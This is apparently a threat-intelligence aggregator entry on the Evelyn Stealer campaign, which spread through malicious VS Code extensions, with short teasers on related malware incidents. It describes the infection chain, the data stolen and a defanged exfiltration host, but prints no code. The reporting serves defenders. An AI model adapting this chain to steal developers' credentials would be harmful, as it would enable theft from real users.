Evelyn Stealer abuse of VS Code extensions to steal developer data
Malware Activity
Summary
Hide ▲
Show ▼
A new stealer operation is using malicious VS Code extensions to compromise software developers, creating a high-risk path into developer environments and broader organizational systems. The payload, Evelyn Stealer, is designed to collect credentials, cryptocurrency data, cookies, and screenshots. It also targets production systems and cloud resources, increasing the chance of follow-on compromise beyond the initial workstation. The activity matters because developer tools and extensions are being turned into a delivery channel for data theft.
Related Happenings
Fox Tempest's malware-signing service scales trusted-signed malware for ransomware gangs
Threat Actor Meta
First: 20.05.2026 00:47
Last: 20.05.2026 00:47
Sources 1
About this happening:
Microsoft disrupted **Fox Tempest**'s **malware-signing service** in **May 2026**, cutting off a criminal platform that helped ransomware gangs and other cybercriminals obtain tru...
Fox Tempest's malware-signing service scales trusted-signed malware for ransomware gangs
Threat Actor MetaAbout this happening: Microsoft disrupted **Fox Tempest**'s **malware-signing service** in **May 2026**, cutting off a criminal platform that helped ransomware gangs and other cybercriminals obtain tru...
Node-ipc malicious versions with stealer/backdoor payload
Malware Activity
First: 14.05.2026 20:22
Last: 14.05.2026 20:22
Sources 1
About this happening:
Three **node-ipc** releases now carry an **obfuscated stealer/backdoor** that can harvest **developer and cloud secrets** from any system that loads the package. The malicious cod...
Node-ipc malicious versions with stealer/backdoor payload
Malware ActivityAbout this happening: Three **node-ipc** releases now carry an **obfuscated stealer/backdoor** that can harvest **developer and cloud secrets** from any system that loads the package. The malicious cod...
ModeloRAT malicious PowerShell and Dropbox delivery activity
Malware Activity
First: 14.05.2026 15:12
Last: 14.05.2026 15:12
Sources 1
About this happening:
The **ModeloRAT** activity now uses a **malicious PowerShell command** and a **Dropbox ZIP payload** to gain persistent footholds, enabling **system reconnaissance**, **screenshot...
ModeloRAT malicious PowerShell and Dropbox delivery activity
Malware ActivityAbout this happening: The **ModeloRAT** activity now uses a **malicious PowerShell command** and a **Dropbox ZIP payload** to gain persistent footholds, enabling **system reconnaissance**, **screenshot...
Sefirah infostealer delivered through a malicious Hugging Face repository
Malware Activity
First: 09.05.2026 17:26
Last: 09.05.2026 17:26
Sources 1
About this happening:
A malicious **Hugging Face** repository impersonated **OpenAI’s Privacy Filter** and delivered **sefirah**, a **Rust-based infostealer**, to **Windows** users, creating credential...
Sefirah infostealer delivered through a malicious Hugging Face repository
Malware ActivityAbout this happening: A malicious **Hugging Face** repository impersonated **OpenAI’s Privacy Filter** and delivered **sefirah**, a **Rust-based infostealer**, to **Windows** users, creating credential...
MacOS living-off-the-land analysis exposing native-feature abuse
Technical Analysis
First: 22.04.2026 19:30
Last: 22.04.2026 19:30
Sources 1
About this happening:
Native macOS features are now being repurposed for **code execution**, **lateral movement**, and **evasion**, widening detection gaps across enterprise Apple fleets. The analysis...
MacOS living-off-the-land analysis exposing native-feature abuse
Technical AnalysisAbout this happening: Native macOS features are now being repurposed for **code execution**, **lateral movement**, and **evasion**, widening detection gaps across enterprise Apple fleets. The analysis...
Timeline
-
20.01.2026 13:48 2 articles · 4mo ago
Evelyn Stealer VS Code extension campaign disclosure
Initial DisclosureCybersecurity researchers disclosed a malware campaign targeting software developers through the Microsoft Visual Studio Code (VS Code) extension ecosystem, with Evelyn Stealer delivered through malicious extensions such as BigBlack.bitcoin-black, BigBlack.codo-ai, and BigBlack.mrbigblacktheme. The campaign was first documented by Koi Security last month and later analyzed by Trend Micro, which described a chain that drops Lightshot.dll, launches a hidden PowerShell command to fetch runtime.exe, injects the stealer into grpconv.exe, and exfiltrates credentials, cryptocurrency-related data, clipboard contents, installed apps, running processes, desktop screenshots, stored Wi-Fi credentials, system information, and Google Chrome and Microsoft Edge cookies to server09.mentality[.]cloud over FTP in ZIP form. The malware also uses browser flags and a mutex to reduce interference and detection, and compromised developer environments may provide access into broader organizational systems.
Show sources
- Evelyn Stealer Malware Abuses VS Code Extensions to Steal Developer Credentials and Crypto — thehackernews.com — 20.01.2026 13:48
- Evelyn Stealer Malware Abuses VS Code Extensions to Steal Developer Credentials and Crypto — thehackernews.com — 20.01.2026 13:48